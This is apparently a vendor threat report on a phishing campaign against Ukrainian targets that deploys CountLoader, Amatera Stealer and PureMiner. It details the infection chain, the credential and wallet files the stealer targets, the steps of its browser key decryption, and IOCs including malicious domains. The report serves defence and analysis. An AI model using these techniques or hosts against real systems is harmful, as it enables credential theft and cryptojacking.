Affected platforms: Microsoft Windows
Impacted parties: Any organization
Impact: Remote control of the victim’s device to collect sensitive information, hijack computing resources, and deliver additional malware
Severity level: High

FortiGuard Labs recently observed a phishing campaign designed to impersonate Ukrainian government agencies and deliver additional malware to targeted systems. The phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments.

When opened, the SVG initiates the download of a password-protected archive that contains a Compiled HTML Help (CHM) file. This CHM file triggers a chain of malicious actions through an HTML Application (HTA) CountLoader, ultimately installing multiple types of malware on the victim’s machine.

In this campaign, Amatera Stealer and PureMiner were deployed as fileless threats. They were executed via .NET Ahead-of-Time (AOT) compilation with process hollowing or loaded directly into memory using PythonMemoryModule, which delivered the final payload.

This blog details how the malware is delivered and provides an analysis of Amatera Stealer and PureMiner, which were both used in the campaign.

Initial Access

The phishing campaign begins with a forged email claiming to be a notice from the National Police of Ukraine. The email includes a malicious SVG attachment (Figure 2). The message states that an appeal has been submitted for review and warns that ignoring the notice could lead to further legal action. The text is generic but uses formal, legal-sounding language to pressure recipients into opening the attachment.

Figure 2: The phishing email

Figure 3: Malicious SVG file

Figure 4: Spoofed Adobe Reader interface

Figure 5: Malicious HTM file extracted from the CHM

CountLoader

Although an HTA file functions much like a standard web page, it also has the ability to access ActiveX controls. In this case, the code is deliberately obfuscated using string encoding and array shuffling to conceal its purpose (Figure 6).

Figure 6: Pre-deobfuscation and post-deobfuscation versions of the code

Figure 7: Core routine of the CountLoader

The decoded response message follows the format shown below.

[{"id":{ID},"url":“{URL}","taskType":{COMMAND ID}}]

The loader supports six commands that allow it to download and execute payloads in multiple formats, perform domain reconnaissance, and remove traces of activity:
 

Table 1: Supported commands

In this campaign, the loader was used to deliver both Amatera Stealer and PureMiner. A related, more recent campaign delivered only Amatera Stealer, but with stronger obfuscation techniques during the delivery stage.

The following section examines the two downloaded ZIP archives and their payloads.

ergosystem.zip to PureMiner

The downloaded ZIP archive, ergosystem.zip, contains one executable file and multiple DLL libraries (Figure 8). In this stage, DLL sideloading is used: a trusted executable loads a malicious DLL. The payload is implemented in .NET and uses Ahead-of-Time (AOT) compilation.      

Figure 8: Files in the ergosystem.zip archive

The payload is initially stored in encrypted form within the .rdata section. It is decrypted and then injected into a newly created .NET Framework tool process using process hollowing. This allows the payload to run under the guise of a legitimate process.

The decrypted payload has been identified as PureMiner, a stealthy .NET cryptominer. PureMiner collects system information—particularly video adapter specifications and usage details—and can deploy CPU-based or GPU-based mining modules depending on the attacker’s configuration.

Figure 9: Latest PureMiner product image found on PureCoder’s website.

Figure 10: Main function and configuration.

Figure 11: Adapter details retrieved from AMD/NVIDIA libraries

Figure 12: Adapter details retrieved from the registry

Figure 13: Information sent to the C2 server

Depending on the received instructions, PureMiner can:

• Save and execute a downloaded payload
• Remove persistence
• Monitor whether analysis tools (e.g., Task Manager, SystemInformer, Process Hacker, Process Explorer, Perfmon) are running
• Check the active window
• Detect whether the system is idle

smtpB.zip to Stealer

Another ZIP archive, smtpB.zip, contains a Python interpreter, supporting modules, and a malicious Python script (Figure 14). This script functions as a downloader, loading the payload directly into memory without writing it to disk. To achieve this, it uses the PythonMemoryModule project from GitHub.

Figure 14: Malicious Python file

Amatera Stealer

When executed, the payload—identified as Amatera Stealer—creates a mutex with hardcoded values. It then connects to a remote server and issues a GET request to the /core/createSession endpoint to obtain a configuration file. This configuration is Base64-decoded, decrypted with the RC4 algorithm, and passed into a parsing routine that controls the data harvesting process (Figure 15).

Figure 15: Code responsible for fetching and parsing the configuration

Figure 17: ‘system_info’ category includes build ID ‘smtp_spam_2’

Figure 18: Decrypted configuration data

System Information

Amatera Stealer first gathers basic system information, including:

• Computer name
• Username
• Operating system name
• User locale settings
• Time zone details
• Machine GUID
• OS installation date

It also collects hardware details such as the video card name, processor model, and total physical memory.

Beyond basic system data, the malware targets additional information:

• Program execution paths
• Active processes
• Installed software

To provide further visibility into the victim’s system, it captures a screenshot and retrieves clipboard contents.

Gecko-based Application

In this module, Amatera Stealer uses configuration data—gecko_paths and gecko_files—to locate directories and files associated with Gecko-based applications. It then appends the /Profiles path to access sensitive files such as:

• key4.db
• logins.json
• cookies.sqlite
• formhistory.sqlite

The following applications are targeted:

• Browser: Firefox, Waterfox, LibreWolf, Pale Moon, Basilisk, IceDragon, Centaury, Wyzo, Cliqz, Cyberfox, BlackHawk Browser, GNU IceCat, Netscape Navigator
• Browser Suite (browser, email, IRC, editor): SeaMonkey
• Chat Client: Instantbird
• Email Client: Thunderbird
• Web Media Player : Songbird

Chromium-based Application

For Chromium-based applications, the malware relies on configuration parameters—chromium_browsers, chromium_files, chromium_extensions, and chromium_apps. These values specify which browsers and applications to target, identify their directory paths, locate browser extension data, and define which files to collect.

The stealer uses two techniques to extract sensitive data:

1. Legacy Cookie Decryption
   • Extracts the encrypted_key from the Local State file.
   • Decodes it from Base64 and verifies it begins with DPAPI.
   • Decrypts the key using the CryptUnprotectData function.
   • Uses the decrypted key to access protected files.
2. App-Bound Encrypted (ABE) Data Decryption
   • Locates the app_bound_encrypted_key in the Local State file.
   • Injects shellcode into the browser process.
   • Leverages COM APIs with the provided CLSID and IID to instantiate a COM object tied to the browser’s Elevation Service.
   • Calls the object’s DecryptData method to retrieve the decrypted app-bound key (Figure 19).

Figure 19: Calling the DecryptData method.

An example configuration for Chrome shows the structure (simplified):

The following targets are defined according to the received configuration:

• Browsers: Chrome, Edge, Brave
• Target files: Login Data, Web Data, and Network\Cookies
• Extensions:
  • Station Wallet     aiifbnbfobpmeekipheeijimdpnlpgpp
  • Trust Wallet     egjidjbpglichdcondbcbdnbeeppgdph
  • MathWallet     afbcbjpbpfadlkmhmclhkeeodmamcflc
  • Coin98 Wallet     aeachknmefphepccionboohckonoeemg
  • MetaMask     nkbihfbeogaeaoehlefnkodbefgpgknn
  • Coinbase Wallet     hnfanknocfeofbddgcijnmhnfnkdnaad
  • BNB Chain Wallet     fhbohimaelbohpjbbldcngcnapndodjp
  • Phantom Wallet     bfnaelmomeimhlpmgjnjophhpkkoljpa
  • Ronin Wallet     fnjhmkhhmkbjkkabndcnnogagogbneec
  • TronLink     ibnejdfjmmkpcnlpebklmnkoeoihofec
  • Keplr     dmkamcknogkgcdfhhbddcghachkejeap
• Applications: Binance, Discord

Applications

In addition to the applications listed in the configuration file, Amatera Stealer contains two hardcoded routines for extracting data from Steam and Telegram (Figure 20).

Figure 20: Application gathering module

• Steam:
  The malware locates the Steam installation path in the registry under:
  HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Valve\Steam
  It then searches for *.vdf files in the installation directory to extract saved information.
• Telegram:
  The malware searches %appdata%\Telegram Desktop\tdata and collects the following files:
  • Dump
  • Webview
  • Emoji
  • Tdummy
  • Temp
  • user_data

The configuration also specifies additional applications for data theft, including:

• FileZilla: Collects connection settings from recentservers.xml in %appdata%\FileZilla
• AnyDesk: Collects configuration files (*.conf) from %appdata%\AnyDesk

Desktop Wallets

This module is designed to steal data from desktop cryptocurrency wallets. The configuration specifies the target path, target filename, and a Boolean flag.

• If the flag is true, the malware performs a recursive file search up to five directory levels deep.
• If the flag is false, it constructs the file path directly by combining the target path and filename.

Targeted Desktop Wallets include: Sparrow, BitcoinCore, DashCore, LitecoinCore, DogecoinCore, Coinomi, Electrum, Qtum, Exodus, Armory, ElectrumLTC, Atomic, WasabiWallet, ElectronCash

File Grabber

The file grabber module collects files according to the grabber_rules defined in the configuration. Each rule consists of four elements:

It involves retrieving files with these extensions from the Desktop: *.txt, *.pdf, *.doc, *.docx, *.xls, *.xlsx, *.html, *.hta, *.png, *.jpg, *.jpeg, *.bmp, and *.svg.

Figure 21: C2 Sign-in page for Amatera Stealer.

Conclusion

This phishing campaign demonstrates how a malicious SVG file can act as an HTML substitute to initiate an infection chain. In this case, attackers targeted Ukrainian government entities with emails containing SVG attachments. The SVG-embedded HTML code redirected victims to a download site.

The downloaded CHM file contained a shortcut object that executed a remote HTA file. This loader was then used to deliver malware payloads to the victim’s system.

Two ZIP archives were downloaded, each ultimately delivering its payload in a fileless manner. Analysis confirmed that Amatera Stealer and PureMiner were deployed in this campaign.

• Amatera Stealer was used to harvest extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets.
• PureMiner was used to collect adapter-specific hardware information and monitor system activity, allowing attackers to deploy CPU or GPU mining modules for maximum efficiency.

Together, these payloads enabled both data theft and resource hijacking in the targeted environment.

Fortinet Protections

The malware described in this report are detected and blocked by FortiGuard Antivirus as:

HTML/Phish.09F5!tr
HTML/Phish.7F92!tr
HLP/Agent.G2!tr
HTA/Agent.38f7!tr
W64/GenKryptik.HFPH!tr
MSIL/Agent.6751!tr
Python/Agent.3F5C!tr.dldr
W64/Agent_AGen.DOB!tr

FortiGate, FortiMail, FortiClient, and FortiEDR all integrate the FortiGuard Antivirus Service, which ensures customers with up-to-date protections are safeguarded against these threats.

FortiMail recognizes the phishing email as “virus detected.” In addition, real-time anti-phishing provided by FortiSandbox embedded in Fortinet’s FortiMail, web filtering, and antivirus solutions provides advanced protection against both known and unknown phishing attempts.

Additionally,

• The FortiGuard CDR (Content Disarm and Reconstruction) service can neutralize malicious macros embedded in documents.
• Organizations are encouraged to take the free Fortinet Certified Fundamentals (FCF) cybersecurity training, which introduces today’s threat landscape and core security concepts.
• The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks attacks by leveraging intelligence from Fortinet’s global network of sensors, CERTs, MITRE, industry partners, and other collaborative sources.

If you believe this or any other cybersecurity threat has impacted your organization, contact the Global FortiGuard Incident Response Team.

IOCs

Domains / IPs:

npulvivgov[.]cfd
ms-team-ping{1 to 10}[.]com
azure-expresscontainer{1 to 10}[.]com
acqua-tecnica[.]it
phuyufact[.]com
109[.]176[.]207[.]110
amaprox[.]click
ama0899[.]shop

Files (SHA-256 Hashes):

bcce8115784909942d0eb7a84065ae2cd5803dc9c45372a461133f9844340436
9cbb497f0878a073504d3699cfbd86a816c7941234729631722d010f6ecd09f5
7deb9e6398c92cf01502f32a78c16f55354dcf3d2b062918f6651852742bc7cd
c25e4bd9e8d49f3beef37377414028b07986dacce5551f96038b930faf887acc
9d2a88f7f4d6925e654ee3edcd334eb9496a279ee0c40f7b14405b35500ebf99
bf9e6bee654831b91e891473123bbd9bc7ff3450471e653c7045f5bd8477d7a1
b8fb772d92a74dcd910ac125ead1c50ce5834b76f58e7f107bb1e16b8c16adbb
61fee7e2012919fafc3b47b37753ff934f7a0ca2a567dca5f15d45ab55ae2211
c62fe8d6c39142c7d8575bd50e6f2fcd9f92c4f0a1a01411d0f3756a09fd78a7
2bd4df59071409af58d0253202b058a6b1f1206663236dea5163e7c30a055f21
27c9c4e200815a9f474126afa05d4266bc55aafa9df0681a333267e4bbd101de
7f505f8a947715ae954e5eb93e9e1911843dc2c16462a146e5658e4101cedc0e
d71148d7e64f2a3464488d696ac2312987eb4e8008c9a62956388d39905c865f